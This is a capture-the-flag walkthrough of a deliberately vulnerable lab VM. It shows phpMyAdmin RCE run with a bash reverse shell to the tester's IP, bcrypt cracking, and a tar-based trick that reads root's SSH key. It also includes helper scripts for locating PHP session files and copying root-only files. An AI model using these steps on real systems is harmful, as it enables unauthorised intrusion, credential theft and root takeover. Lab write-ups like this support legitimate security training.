Description

The Presidential Elections within the USA are just around the corner (November 2020). One of the political parties is concerned that the other political party is going to perform electoral fraud by hacking into the registration system, and falsifying the votes.

The state of Ontario has therefore asked you (an independent penetration tester) to test the security of their server in order to alleviate any electoral fraud concerns. Your goal is to see if you can gain root access to the server – the state is still developing their registration website but has asked you to test their server security before the website and registration system are launched.

This CTF was created and has been tested with VirtualBox. It should also be compatible with VMWare and is DHCP enabled.

Rating: Medium/Hard - Enumeration is your friend


Host discovery

image-20221212105204428

```text
Kali   192.168.169.220
Target 192.168.169.230
```

Port scan

image-20221212105322733

Open ports: 80 and 2082

Visiting the site

image-20221212105437599

Directory brute-force

```bash
gobuster dir -u http://192.168.169.230/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,js,php.bat.bak,zip,zip.bak
```

image-20221212105839105

about

image-20221212110038006

assets

image-20221212110201188

config

image-20221212110327916

  • Blank page

dirsearch

image-20221212110733718

  • dirsearch turns up one more file

image-20221212110821545

  • Also blank, but the page source gives something away (a hostname, used in the next step)

image-20221212110900989

Subdomains (vhost fuzzing)

  • First map the hostname to the target IP in /etc/hosts

image-20221212111727735

```bash
wfuzz -H 'HOST: FUZZ.votenow.local' -u http://192.168.169.230/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt --hw 854,45
```

`--hw 854,45` hides responses with 854 or 45 words, i.e. the two response sizes the server returns for unknown Host headers, so only vhosts that serve something different remain.

image-20221212113024988

```text
datasafe.votenow.local
```

image-20221212113621018

Login

The leaked config file contains database credentials, which also work for the phpMyAdmin instance on datasafe.votenow.local:

```php
<?php

$dbUser = "votebox";
$dbPass = "casoj3FFASPsbyoRP";
$dbHost = "localhost";
$dbname = "votebox";

?>
```

image-20221212115123831

image-20221212115321527

```text
admin  $2y$12$d/nOEjKNgk/epF2BeAFaMu8hW4ae3JJk8ITyh48q97awT/G7eQ11i
```
  • The password column holds a bcrypt hash; crack it with john
```bash
echo '$2y$12$d/nOEjKNgk/epF2BeAFaMu8hW4ae3JJk8ITyh48q97awT/G7eQ11i' > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
```
  • Since cracking takes a long time, I just took the result someone else had already obtained

image-20221212121428652

image-20221212122542465

```text
Stella
```
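Before starting a crack that may run for a long time, it is worth reading the hash itself: the `$2y$12$` prefix says bcrypt with cost 12, i.e. 2^12 = 4096 key-setup rounds per guess, which is why rockyou against a single hash is slow. The following is an added example, not part of the original writeup, that dissects a bcrypt string into its fields and reports the work factor; the layout it checks (id, cost, 22-character salt, 31-character digest) is the standard bcrypt modular-crypt format.

```sh
#!/bin/sh
# Added example, not from the original writeup: dissect a bcrypt string before
# starting a long crack so you know the work factor you are up against.
# Layout: $<id>$<cost>$<22-char salt><31-char digest>, id is 2a, 2b or 2y.

# Print "id cost salt digest" for a bcrypt hash, or fail on anything else.
bcrypt_fields() {
    hash=$1
    case "$hash" in
        '$2a$'*|'$2b$'*|'$2y$'*) ;;
        *) echo "not a bcrypt hash: $hash" >&2; return 1 ;;
    esac
    tmp=${hash#\$}            # strip the leading '$'
    id=${tmp%%\$*}            # e.g. 2y
    tmp=${tmp#*\$}
    cost=${tmp%%\$*}          # e.g. 12
    rest=${tmp#*\$}           # salt+digest in bcrypt base64 (never contains '$')
    if [ ${#rest} -ne 53 ]; then
        echo "salt+digest is ${#rest} chars, expected 53" >&2
        return 1
    fi
    salt=$(printf '%s' "$rest" | cut -c1-22)
    digest=$(printf '%s' "$rest" | cut -c23-)
    printf '%s %s %s %s\n' "$id" "$cost" "$salt" "$digest"
}

# Cost parameter alone (bcrypt performs 2^cost expensive key setups per guess).
bcrypt_cost() {
    bcrypt_fields "$1" | cut -d' ' -f2
}

# Iterations implied by the cost: 2^cost.
bcrypt_rounds() {
    c=$(bcrypt_cost "$1")
    [ -n "$c" ] || return 1
    c=${c#0}                  # "08" would otherwise be read as octal
    echo $((1 << $c))
}

# Usage: bcrypt_rounds '$2y$12$d/nOEjKNgk/epF2BeAFaMu8hW4ae3JJk8ITyh48q97awT/G7eQ11i'  -> 4096
```

john detects `$2y$` on its own, but `--format=bcrypt` makes the choice explicit; with hashcat the equivalent mode is `-m 3200`. The salt is random per hash, so a cracked password from another box never helps, only the same wordlist does.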

ssh

```bash
ssh admin@192.168.169.230 -p 2082
```

image-20221212121635037

Exploitation

image-20221212122317115

image-20221212122411274

  • searchsploit lists phpMyAdmin 4.8.1 - Remote Code Execution (RCE), EDB-ID 50457

image-20221212122519038

  • Looking at the exploit file, nothing I tried worked; in the end I followed another writeup and changed `sessions` to `session` in the script, i.e. the directory where the target's PHP stores its session files

image-20221212124028999
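The `sessions` vs `session` detail is a distribution difference rather than a bug in the technique: the exploit needs the path of the PHP session file it makes phpMyAdmin include, and Debian/Ubuntu keep those under `/var/lib/php/sessions` while CentOS/RHEL use `/var/lib/php/session`. The following is an added example, not part of the original writeup or of the exploit script, that enumerates candidate session-file paths to try in order and, once you have a shell, asks the target's PHP where it really saves sessions. The candidate directory list is an assumption; extend it for other platforms.

```sh
#!/bin/sh
# Added example, not part of the original writeup or of the exploit script.
# Candidate PHP session directories (assumed list; order is the order to try).
PHP_SESSION_CANDIDATES="/var/lib/php/session /var/lib/php/sessions /var/lib/php5 /tmp"

# Ask the local PHP CLI where it saves sessions; only useful once you have a
# shell on the target. Some builds report "N;/path" when a directory-depth
# prefix is configured, so keep only the part after the last ';'.
php_reported_session_dir() {
    command -v php >/dev/null 2>&1 || return 1
    p=$(php -r 'echo ini_get("session.save_path");' 2>/dev/null) || return 1
    p=${p##*;}
    [ -n "$p" ] && echo "$p"
}

# Print the first directory in a space-separated list that exists.
first_existing_dir() {
    for d in $1; do
        if [ -d "$d" ]; then
            echo "$d"
            return 0
        fi
    done
    return 1
}

# Best effort on a box you already have a shell on: what PHP says, then defaults.
find_php_session_dir() {
    php_reported_session_dir || first_existing_dir "$PHP_SESSION_CANDIDATES"
}

# File PHP would open for a given PHPSESSID cookie value. Session ids consist
# of letters, digits, ',' and '-' only; reject anything else so a stray
# character can never turn this into a different path.
php_session_file() {
    dir=$1
    sid=$2
    case "$sid" in
        ''|*[!A-Za-z0-9,-]*) echo "refusing odd session id: $sid" >&2; return 1 ;;
    esac
    echo "${dir%/}/sess_$sid"
}

# All candidate session-file paths for a cookie, to try one after another when
# the target cannot be inspected first.
php_session_file_candidates() {
    for d in $PHP_SESSION_CANDIDATES; do
        php_session_file "$d" "$1"
    done
}
```

When the exploit fails silently, looping the include over `php_session_file_candidates "$PHPSESSID"` is quicker than editing the script for each guess; after landing a shell, `find_php_session_dir` confirms which one was right.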

Running the exploit

  • Start a listener on Kali

image-20221212124255961

  • Run the exploit script, following an existing example. As used here its positional arguments are: target host, port, web path (empty for the document root), database user, database password, and the command to execute, in this case a bash reverse shell back to the Kali listener

image-20221212124325589

```bash
python 50457.py datasafe.votenow.local 80 "" votebox casoj3FFASPsbyoRP "bash -c 'bash -i >& /dev/tcp/192.168.169.220/6666 0>&1'"
```

image-20221212124731542

  • Success: the reverse shell connects back

Privilege escalation

Upgrade to an interactive shell:

```bash
python -c 'import pty; pty.spawn("/bin/bash")'
```
  • We already have a username and password from earlier (admin / Stella); switch user with su, and mind the case of the password

image-20221212125218743

image-20221212125413952

image-20221212125558432

```bash
cd ~
cat notes.txt                  # notes left in admin's home directory
whereis tarS
ls -al /usr/bin/tarS           # a renamed copy of tar

# tarS can read files that admin cannot, so archive root's SSH key with it
tarS -cvf key.tar /root/.ssh/id_rsa
# tar strips the leading "/", so the key is extracted to ./root/.ssh/id_rsa
tar -xvf key.tar
cd root/.ssh
ssh -i id_rsa root@localhost -p 2082
```
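The `ls -al` output alone does not explain why a copy of tar can read a file in /root, so check before relying on it: the usual reason is a file capability such as cap_dac_read_search (bypasses file read permission checks) or a SUID bit, and both are a one-liner to enumerate. The following is an added example, not part of the original writeup, that lists those bits and wraps the archive-then-extract trick in a function; the archive name and the idea that tarS carries a capability are assumptions, as the page only shows the `ls` listing.

```sh
#!/bin/sh
# Added example, not from the original writeup.
# Assumption: the tar copy is privileged through a file capability or SUID bit;
# the writeup only shows "ls -al /usr/bin/tarS".

# List binaries with file capabilities and with the SUID bit; both deserve a look.
enum_privilege_bits() {
    getcap -r / 2>/dev/null
    find / -perm -4000 -type f 2>/dev/null
}

# Archive $src with the given tar binary and unpack it under $dest, then print
# the path of the extracted copy. tar strips the leading "/" from member names,
# so /root/.ssh/id_rsa ends up at $dest/root/.ssh/id_rsa.
copy_via_tar() {
    tarbin=$1
    src=$2
    dest=$3
    mkdir -p "$dest" || return 1
    "$tarbin" -cf "$dest/key.tar" "$src" 2>/dev/null || return 1   # needs the privileged tar
    "$tarbin" -xf "$dest/key.tar" -C "$dest" || return 1           # any tar will do here
    echo "$dest/${src#/}"
}

# Usage on the box: copy_via_tar /usr/bin/tarS /root/.ssh/id_rsa "$HOME/loot"
# then: ssh -i "$HOME/loot/root/.ssh/id_rsa" root@localhost -p 2082
```

`getcap -r /` prints entries like `/usr/bin/tarS cap_dac_read_search=ep` when a capability is the cause; if it prints nothing and the binary is not SUID, look for a sudo rule instead. The same archive-and-extract trick works for /etc/shadow or any other root-only file.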

image-20221212130712603

image-20221212130746178